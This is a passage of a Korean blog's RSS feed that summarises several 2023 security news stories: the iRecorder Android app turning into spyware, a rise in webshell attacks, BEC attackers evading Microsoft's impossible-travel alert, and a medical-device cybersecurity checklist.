data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/640</guid>
      <comments>https://jennana.tistory.com/640#entry640comment</comments>
      <pubDate>Thu, 1 Jun 2023 23:55:09 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 정상적으로 유통되던 안드로이드 앱, 갑자기 멀웨어로 돌변</title>
      <link>https://jennana.tistory.com/639</link>
      <description>&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;1년 이상 정상적으로 유통 및 사용되던 안드로이드 앱 '아이리코더(iRecorder Screen Recorder)'가 갑자기 오디오와 화면 정보를 수집하는 스파이웨어로 변했다. 가장 먼저 발견한 업체는 이셋(ESET)이며, 현재 구글 앱 스토어에서는 삭제 되었다. 이셋에서는 1년동안 정상적으로 작동했던 이유는 충분한 사용자 수를 확보한 후에 악성 기능을 추가하려고 했던 것으로 보인다고 했다.&lt;br&gt;&lt;/b&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;728&quot; data-origin-height=&quot;655&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dpqArK/btshBlzOfCK/vlFQEOW90BcSulDMDhcx01/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dpqArK/btshBlzOfCK/vlFQEOW90BcSulDMDhcx01/img.png&quot; data-alt=&quot;사진 출처 :gizchina.com&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dpqArK/btshBlzOfCK/vlFQEOW90BcSulDMDhcx01/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdpqArK%2FbtshBlzOfCK%2FvlFQEOW90BcSulDMDhcx01%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;728&quot; height=&quot;655&quot; data-origin-width=&quot;728&quot; data-origin-height=&quot;655&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;사진 출처 :gizchina.com&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;- 앱 이름 :iRecorder - Screen Recorder&lt;br&gt;- 앱 출시 : 2021년 9월 19일 Google Play 스토어&lt;br&gt;- 앱 다운로드 횟수 : 50,000회 이상&lt;br&gt;- 해당 앱 개발자 : Coffeeholic Dev&lt;br&gt;- 해당 앱이 악성 행위 시작 : 11개월 후 악성 기능이 추가&lt;br&gt;- 악성 기능 : 원격으로 마이크 켜고 녹음, c2서버와 연결, 장비에 저장된 녹음파일과 다른 민감한 파일 업로드&lt;br&gt;1) 훔쳐가는 정보 : 주소록, SMS 메시지, 전화 로그, 브라우저 히스토리, 장치 위치, 장치 스크린샷&lt;br&gt;2) 악성 기능 : 전화 걸기, 문자보내기, 인터넷 켜기, 스크린샷 찍기&lt;br&gt;- 조치 : 구글에서 해당 앱에 AhMyth 트로이 목마를 포함하고 있다 신고 후 삭제 함.&lt;br&gt;&lt;br&gt;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문가용 기자,정상적으로 유통되던 안드로이드 앱, 갑자기 멀웨어로 돌변, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=118484&amp;amp;page=4&amp;amp;kind=1&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.boannews.com/media/view.asp?idx=118484&amp;amp;page=4&amp;amp;kind=1&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;정상적으로 유통되던 안드로이드 앱, 갑자기 멀웨어로 돌변&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;IT 외신 레지스터에 의하면 한 안드로이드 앱이 정상적으로 유통되다가 갑자기 스파이웨어로 돌변했는데, 구글이 이런 상황을 놓쳤다고 한다. 문제의 앱은 아이리코더(iRecorder - Screen Recorder)이며&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=118484&amp;amp;page=4&amp;amp;kind=1&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/pCTB8/hySNh7zMEc/HfkrkfrjFOJldw7kcuSM0k/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=118484&quot;&gt;&lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=118484&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=118484&amp;amp;page=4&amp;amp;kind=1&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/pCTB8/hySNh7zMEc/HfkrkfrjFOJldw7kcuSM0k/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;정상적으로 유통되던 안드로이드 앱, 갑자기 멀웨어로 돌변&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;IT 외신 레지스터에 의하면 한 안드로이드 앱이 정상적으로 유통되다가 갑자기 스파이웨어로 돌변했는데, 구글이 이런 상황을 놓쳤다고 한다. 문제의 앱은 아이리코더(iRecorder - Screen Recorder)이며&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;a href=&quot;https://www.gizchina.com/2023/05/24/android-screen-recorder-app-irecorder-found-to-be-malware-heres-what-you-need-to-know/&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.gizchina.com/2023/05/24/android-screen-recorder-app-irecorder-found-to-be-malware-heres-what-you-need-to-know/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;Android Screen Recorder App iRecorder Found To Be Malware: Here's What You Need To Know&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;The popular iRecorder screen recorder app has been infected with malware. Find out what you need to know and how to protect your device...&quot; data-og-host=&quot;www.gizchina.com&quot; data-og-source-url=&quot;https://www.gizchina.com/2023/05/24/android-screen-recorder-app-irecorder-found-to-be-malware-heres-what-you-need-to-know/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bS9T6D/hySM9oefQS/pP2a223kjH3o55jReBKqNk/img.jpg?width=1200&amp;amp;height=709&amp;amp;face=0_0_1200_709&quot; data-og-url=&quot;https://www.gizchina.com/2023/05/24/android-screen-recorder-app-irecorder-found-to-be-malware-heres-what-you-need-to-know/&quot;&gt;&lt;a href=&quot;https://www.gizchina.com/2023/05/24/android-screen-recorder-app-irecorder-found-to-be-malware-heres-what-you-need-to-know/&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.gizchina.com/2023/05/24/android-screen-recorder-app-irecorder-found-to-be-malware-heres-what-you-need-to-know/&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bS9T6D/hySM9oefQS/pP2a223kjH3o55jReBKqNk/img.jpg?width=1200&amp;amp;height=709&amp;amp;face=0_0_1200_709')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;Android Screen Recorder App iRecorder Found To Be Malware: Here's What You Need To Know&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;The popular iRecorder screen recorder app has been infected with malware. Find out what you need to know and how to protect your device...&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.gizchina.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://arstechnica.com/information-technology/2023/05/app-with-50000-google-play-installs-sent-attackers-mic-recordings-every-15-minutes/&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://arstechnica.com/information-technology/2023/05/app-with-50000-google-play-installs-sent-attackers-mic-recordings-every-15-minutes/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;Legit app in Google Play turns malicious and sends mic recordings every 15 minutes&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;The malicious iRecorder app has come to light, but its purpose remains shrouded.&quot; data-og-host=&quot;arstechnica.com&quot; data-og-source-url=&quot;https://arstechnica.com/information-technology/2023/05/app-with-50000-google-play-installs-sent-attackers-mic-recordings-every-15-minutes/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/XTkZD/hySNirWf5l/FgKe326GMdtEpEkatlQn61/img.jpg?width=760&amp;amp;height=380&amp;amp;face=0_0_760_380&quot; data-og-url=&quot;https://arstechnica.com/information-technology/2023/05/app-with-50000-google-play-installs-sent-attackers-mic-recordings-every-15-minutes/&quot;&gt;&lt;a href=&quot;https://arstechnica.com/information-technology/2023/05/app-with-50000-google-play-installs-sent-attackers-mic-recordings-every-15-minutes/&quot; target=&quot;_blank&quot; data-source-url=&quot;https://arstechnica.com/information-technology/2023/05/app-with-50000-google-play-installs-sent-attackers-mic-recordings-every-15-minutes/&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/XTkZD/hySNirWf5l/FgKe326GMdtEpEkatlQn61/img.jpg?width=760&amp;amp;height=380&amp;amp;face=0_0_760_380')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;Legit app in Google Play turns malicious and sends mic recordings every 15 minutes&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;The malicious iRecorder app has come to light, but its purpose remains shrouded.&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;arstechnica.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/639</guid>
      <comments>https://jennana.tistory.com/639#entry639comment</comments>
      <pubDate>Sun, 28 May 2023 02:20:51 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스]1년새 2배 된 '웹셀 공격' 비중&amp;hellip;SK쉴더스 &amp;quot;초기침투만 집중 안 돼&amp;quot;</title>
      <link>https://jennana.tistory.com/638</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;736&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/visJe/btshy8Vq6x3/kkmi1Wh1OhUXwNU7dWM5f1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/visJe/btshy8Vq6x3/kkmi1Wh1OhUXwNU7dWM5f1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/visJe/btshy8Vq6x3/kkmi1Wh1OhUXwNU7dWM5f1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FvisJe%2Fbtshy8Vq6x3%2Fkkmi1Wh1OhUXwNU7dWM5f1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;540&quot; height=&quot;736&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;736&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 : &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;SK쉴더스는 보안 세미나에서' 웹셸(Webshell)'을 활용한 공격 비중이 2배로 증가하였다고 발표했다. 웹셸은 공격자가 웹서버를 원격으로 제어할 수 있는 악성코드를 의미하며 이런 전통적인 해킹 기법이 성행하는 이유로 '초기 침투'에만 집중하는 경향때문이라고 한다.&lt;br&gt;이를 개선하기 위해서는 초기 침투뿐만이 아니라 거점확보부터 지속실행단계까지 모든 단계에 주의를 기울여야 한다고 당부했다.&lt;br&gt;또한 신규 취약점과 랜섬웨어 공격에 대한 주의도 필요하며, 최근에는 랜섬웨어가 보다 치밀한 수법으로 개발되고 있다고 경고했다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;-일반적으로APT(지능형 지속위협) 공격은 △초기 침투 △거점 확보 △권한 상승 △내부 정찰 △내부 이동 △지속 실행 △목표 달성 순으로 흐름&lt;br&gt;- 웹셸 공격 예시 :2021년 서울대병원 개인정보 유출 사고 역시 '웹쉘 공격'에서 비롯됐다.&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;오현주 기자,1년새 2배 된 '웹셀 공격' 비중…SK쉴더스 &quot;초기침투만 집중 안 돼&quot;, news1, &lt;a href=&quot;https://n.news.naver.com/mnews/article/421/0006827653?sid=105&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://n.news.naver.com/mnews/article/421/0006827653?sid=105&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;1년새 2배 된 '웹셀 공격' 비중…SK쉴더스 &amp;quot;초기침투만 집중 안 돼&amp;quot;&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;지난해 '웹셀'(Webshell) 활용 공격 비중이 전년 대비 2배로 증가한 것으로 나타났다. '웹셀'은 공격자가 원격으로 웹서버를 제어할 수 있는 악성코드를 말한다. 김성동 SK쉴더스 탑서트(Top-CERT) 담당&quot; data-og-host=&quot;n.news.naver.com&quot; data-og-source-url=&quot;https://n.news.naver.com/mnews/article/421/0006827653?sid=105&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/g70x7/hySLJRf4cB/RIQeldl9KezkYmcuEjGOc0/img.jpg?width=800&amp;amp;height=484&amp;amp;face=0_0_800_484&quot; data-og-url=&quot;https://n.news.naver.com/mnews/article/421/0006827653?sid=105&quot;&gt;&lt;a href=&quot;https://n.news.naver.com/mnews/article/421/0006827653?sid=105&quot; target=&quot;_blank&quot; data-source-url=&quot;https://n.news.naver.com/mnews/article/421/0006827653?sid=105&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/g70x7/hySLJRf4cB/RIQeldl9KezkYmcuEjGOc0/img.jpg?width=800&amp;amp;height=484&amp;amp;face=0_0_800_484')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;1년새 2배 된 '웹셀 공격' 비중…SK쉴더스 &quot;초기침투만 집중 안 돼&quot;&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;지난해 '웹셀'(Webshell) 활용 공격 비중이 전년 대비 2배로 증가한 것으로 나타났다. '웹셀'은 공격자가 원격으로 웹서버를 제어할 수 있는 악성코드를 말한다. 김성동 SK쉴더스 탑서트(Top-CERT) 담당&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;n.news.naver.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/638</guid>
      <comments>https://jennana.tistory.com/638#entry638comment</comments>
      <pubDate>Fri, 26 May 2023 23:49:19 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 강력해진 BEC 공격자들, MS의 &amp;lsquo;불가능한 이동&amp;rsquo; 경고도 속인다</title>
      <link>https://jennana.tistory.com/637</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;995&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/SCBax/btshrTpDLKr/A0QS01o5vNfCsXugGgvzY0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/SCBax/btshrTpDLKr/A0QS01o5vNfCsXugGgvzY0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/SCBax/btshrTpDLKr/A0QS01o5vNfCsXugGgvzY0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FSCBax%2FbtshrTpDLKr%2FA0QS01o5vNfCsXugGgvzY0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;540&quot; height=&quot;995&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;995&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 : &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;BEC 공격자들이 MS의 보안 기능 '불가능한 이동(impossible travel)' 경고 신호가 뜨지 않게 하는 공격 전술을 개발하였다. '불가능한 이동' 경고는 현재 접속위치와 마지막 접속 위치간의 물리적인 거리와 시간을 계산해서 정상적인 접속인지를 판단해주는 보안 기능이지만 공격자는 근처 지역에서 생성되는 IP주소를 구매하여 자신들의 로그인 시도를 감추는 방식을 이용하여 우회하고 있다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;br&gt;- 공격자들이 이용하는 기술 : 불릿프로프트링크(BulletProftLink)와 같은 플렛폼 + 피해자 지역 내 IP서비스 혼합 이용&lt;br&gt;- BEC 공격 대상 : 기업 임원진, 관리자급 직업(주로 재무 담당자, HR 직원 - 금융/개인정보), 신규직원(실수가 많음)&lt;br&gt;- 대응방법 : 메일 보안 솔루션 디마카(DMARC) 활성화, 사내 인증 관련 규정 보다 엄격하게 설정, 임직원 교육&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문가용 기자,강력해진 BEC 공격자들, MS의 ‘불가능한 이동’ 경고도 속인다, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=118448&amp;amp;page=1&amp;amp;kind=1&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.boannews.com/media/view.asp?idx=118448&amp;amp;page=1&amp;amp;kind=1&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;강력해진 BEC 공격자들, MS의 ‘불가능한 이동’ 경고도 속인다&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;BEC 공격자들이 탐지 기술을 회피하는 새로운 방법을 터득했다. 근처 지역에서 생성된 IP 주소를 구매해서 자신들의 로그인 시도를 감추는 것이다. 이렇게 했을 때 MS의 보안 기능 중 하나인 ‘불&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=118448&amp;amp;page=1&amp;amp;kind=1&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/breokP/hySLyBAPQf/ZfEWKk3QirqgCXZsZIxsP1/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=118448&quot;&gt;&lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=118448&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=118448&amp;amp;page=1&amp;amp;kind=1&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/breokP/hySLyBAPQf/ZfEWKk3QirqgCXZsZIxsP1/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;강력해진 BEC 공격자들, MS의 ‘불가능한 이동’ 경고도 속인다&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;BEC 공격자들이 탐지 기술을 회피하는 새로운 방법을 터득했다. 근처 지역에서 생성된 IP 주소를 구매해서 자신들의 로그인 시도를 감추는 것이다. 이렇게 했을 때 MS의 보안 기능 중 하나인 ‘불&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/637</guid>
      <comments>https://jennana.tistory.com/637#entry637comment</comments>
      <pubDate>Thu, 25 May 2023 23:51:40 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 의료기기 사이버보안 가이드라인, 심사&amp;middot;허가 위한 체크리스트와 요구사항 살펴보니</title>
      <link>https://jennana.tistory.com/636</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;806&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/B8k8y/btsgCF1ADGC/tNLtG2MSeCVWboqfRj2ysk/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/B8k8y/btsgCF1ADGC/tNLtG2MSeCVWboqfRj2ysk/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/B8k8y/btsgCF1ADGC/tNLtG2MSeCVWboqfRj2ysk/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FB8k8y%2FbtsgCF1ADGC%2FtNLtG2MSeCVWboqfRj2ysk%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;540&quot; height=&quot;806&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;806&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;식품의약품안전처(식약처)는 의료기기의 사이버보안을 강화하기 위해 사이버보안 가이드라인을 제정했다. 가이드라인은 의료기기의 사이버보안 특성과 요구사항을 설명하며, 의료기기의 사이버보안 허가와 심사를 위한 체크리스트도 포함하고 있다. &lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;체크리스트에는 의료기기 사이버보안에 관련된 7가지 항목이 포함되어 있으며, 의료기기의 보안 요구사항이 충족되었는지 확인할 수 있다. 또한, 성능시험성적서, 사이버보안 위험관리문서, 소프트웨어 검증 및 유효성 확인 자료 등이 요구되며, 이를 통해 의료기기의 사이버보안을 확인하고 관리할 수 있다. 의료기기에 대한 사이버보안의 중요성은 의료기기를 통해 사람의 건강과 생명이 위협받을 수 있기에, 식약처는 이를 강조하고 의료기기 사이버보안에 대한 이해도를 높이기 위해 다양한 업무 설명회를 개최하고 있다.&lt;br&gt;&lt;br&gt;- 의료기기 이용한 사망 사례 :&lt;br&gt;2020년 9월 독일 뒤셀도르프 대학병원 랜섬웨어 감염으로 인한 시스템 마비로 환자 치료 불가로 다른 병원 이송 중에 위중한 환자 사망.&lt;br&gt;&lt;br&gt;- 의료기기 체크리스트 :&lt;br&gt;△보안통신 △데이터 보호 △기기 무결성 △사용자 인증 △소프트웨어 유지·보수 △물리적 접근 △신뢰성 및 가용성 총 7가지로 구성&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;박은주 기자, 의료기기 사이버보안 가이드라인, 심사·허가 위한 체크리스트와 요구사항 살펴보니, 보안뉴스, &lt;a href=&quot;https://m.boannews.com/html/detail.html?mtype=3&amp;amp;tab_type=6&amp;amp;idx=117564&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://m.boannews.com/html/detail.html?mtype=3&amp;amp;tab_type=6&amp;amp;idx=117564&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;의료기기 사이버보안 가이드라인, 심사·허가 위한 체크리스트와 요구사항 살펴보니&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;식품의약품안전처(이하 식약처)에서는 의료기기 사이버보안 가이드라인을 제정해 의료기기의 사이버보안 사항을 설명하고, 이를 바탕으로 보안을 강화할 수 있도록 하고 있다. 이에 &lt;보안뉴스&gt;&quot; data-og-host=&quot;m.boannews.com&quot; data-og-source-url=&quot;https://m.boannews.com/html/detail.html?mtype=3&amp;amp;tab_type=6&amp;amp;idx=117564&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/KSoaE/hySHcZVgEp/Km1k4CQLZalwPQQCuPPld0/img.jpg?width=1000&amp;amp;height=377&amp;amp;face=0_0_1000_377&quot; data-og-url=&quot;http://m.boannews.com/html/detail.html?idx=117564&quot;&gt;&lt;a href=&quot;http://m.boannews.com/html/detail.html?idx=117564&quot; target=&quot;_blank&quot; data-source-url=&quot;https://m.boannews.com/html/detail.html?mtype=3&amp;amp;tab_type=6&amp;amp;idx=117564&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/KSoaE/hySHcZVgEp/Km1k4CQLZalwPQQCuPPld0/img.jpg?width=1000&amp;amp;height=377&amp;amp;face=0_0_1000_377')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;의료기기 사이버보안 가이드라인, 심사·허가 위한 체크리스트와 요구사항 살펴보니&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;식품의약품안전처(이하 식약처)에서는 의료기기 사이버보안 가이드라인을 제정해 의료기기의 사이버보안 사항을 설명하고, 